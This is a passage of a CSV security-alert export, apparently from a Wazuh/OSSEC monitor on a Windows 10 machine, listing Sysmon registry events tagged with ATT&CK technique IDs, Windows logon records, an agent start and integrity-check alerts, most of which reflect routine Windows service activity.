12:33:14.570"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CDPUserSvc_3f376\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.570 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CDPUserSvc_3f376\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 12:33:19.289",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.622061000Z"",""eventRecordID"":""586"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.570\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CDPUserSvc_3f376\\Start\r\nDetails: DWORD (0x00000002)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.570"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CDPUserSvc_3f376\\\\Start"",""details"":""DWORD (0x00000002)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.570 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CDPUserSvc_3f376\Start +Details: DWORD (0x00000002)""" +"Apr 24, 2020 @ 12:33:19.244",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.621222700Z"",""eventRecordID"":""585"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.570\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\cbdhsvc_3f376\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k ClipboardSvcGroup -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.570"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\cbdhsvc_3f376\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k ClipboardSvcGroup -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.570 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\cbdhsvc_3f376\ImagePath +Details: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p""" +"Apr 24, 2020 @ 12:33:19.231",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.620790800Z"",""eventRecordID"":""584"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.570\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\cbdhsvc_3f376\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.570"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\cbdhsvc_3f376\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.570 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\cbdhsvc_3f376\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:33:19.216",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.619985500Z"",""eventRecordID"":""583"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.570\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CaptureService_3f376\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k LocalService -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.570"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CaptureService_3f376\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k LocalService -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.570 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CaptureService_3f376\ImagePath +Details: C:\Windows\system32\svchost.exe -k LocalService -p""" +"Apr 24, 2020 @ 12:33:19.199",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.619751800Z"",""eventRecordID"":""582"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.570\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CaptureService_3f376\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.570"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CaptureService_3f376\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.570 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CaptureService_3f376\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:33:19.183",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.602079700Z"",""eventRecordID"":""581"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.554\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BluetoothUserService_3f376\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k BthAppGroup -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.554"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BluetoothUserService_3f376\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k BthAppGroup -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.554 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BluetoothUserService_3f376\ImagePath +Details: C:\Windows\system32\svchost.exe -k BthAppGroup -p""" +"Apr 24, 2020 @ 12:33:19.168",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.601579500Z"",""eventRecordID"":""580"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.554\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BluetoothUserService_3f376\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.554"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BluetoothUserService_3f376\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.554 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BluetoothUserService_3f376\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:33:19.161",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.580724900Z"",""eventRecordID"":""579"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.554\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BcastDVRUserService_3f376\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k BcastDVRUserService\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.554"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BcastDVRUserService_3f376\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k BcastDVRUserService""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.554 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BcastDVRUserService_3f376\ImagePath +Details: C:\Windows\system32\svchost.exe -k BcastDVRUserService""" +"Apr 24, 2020 @ 12:33:19.142",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.580325500Z"",""eventRecordID"":""578"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.554\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BcastDVRUserService_3f376\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.554"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BcastDVRUserService_3f376\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.554 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BcastDVRUserService_3f376\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:33:19.091",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.567794300Z"",""eventRecordID"":""576"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.554\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\AarSvc_3f376\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k AarSvcGroup -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.554"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\AarSvc_3f376\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k AarSvcGroup -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.554 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\AarSvc_3f376\ImagePath +Details: C:\Windows\system32\svchost.exe -k AarSvcGroup -p""" +"Apr 24, 2020 @ 12:33:19.076",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.567434400Z"",""eventRecordID"":""575"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.554\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\AarSvc_3f376\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.554"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\AarSvc_3f376\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.554 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\AarSvc_3f376\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:33:18.099",5,"SessionEnv was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 24, 2020 @ 12:33:16.293",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: No + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x37A9A + Linked Logon ID: 0x37A24 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x40 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:33:16.262",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x37A24 + Linked Logon ID: 0x37A9A + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x40 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:33:14.653",7,"SessionEnv was unavailable to handle a critical notification event",,"""The winlogon notification subscriber was unavailable to handle a critical notification event.""" +"Apr 24, 2020 @ 12:33:14.166",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:33:11.442",3,"Ossec agent started.","ossec: Agent started: 'windows-10->any'.", +"Apr 24, 2020 @ 12:32:37.857",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed. +Old md5sum was: '497a8c7081c737f07c267a30b1538ff9' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: '58d9cdbd07af978efc5e91b8e7a66696280d3b1e' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +", +"Apr 24, 2020 @ 12:32:37.842",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility' checksum changed. +Old md5sum was: '44a185f2e5e0fa09edbcbe3e598fe4da' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: 'f7a3cf6aa04ebaeee3c4525064299cb2136e4f06' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +", +"Apr 24, 2020 @ 12:32:34.527",5,"SessionEnv was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 24, 2020 @ 12:32:34.510",5,"WSearch was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 24, 2020 @ 12:31:56.098",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:31:49.079",3,"Service startup type was changed",,"""The start type of the Background Intelligent Transfer Service service was changed from demand start to auto start.""" 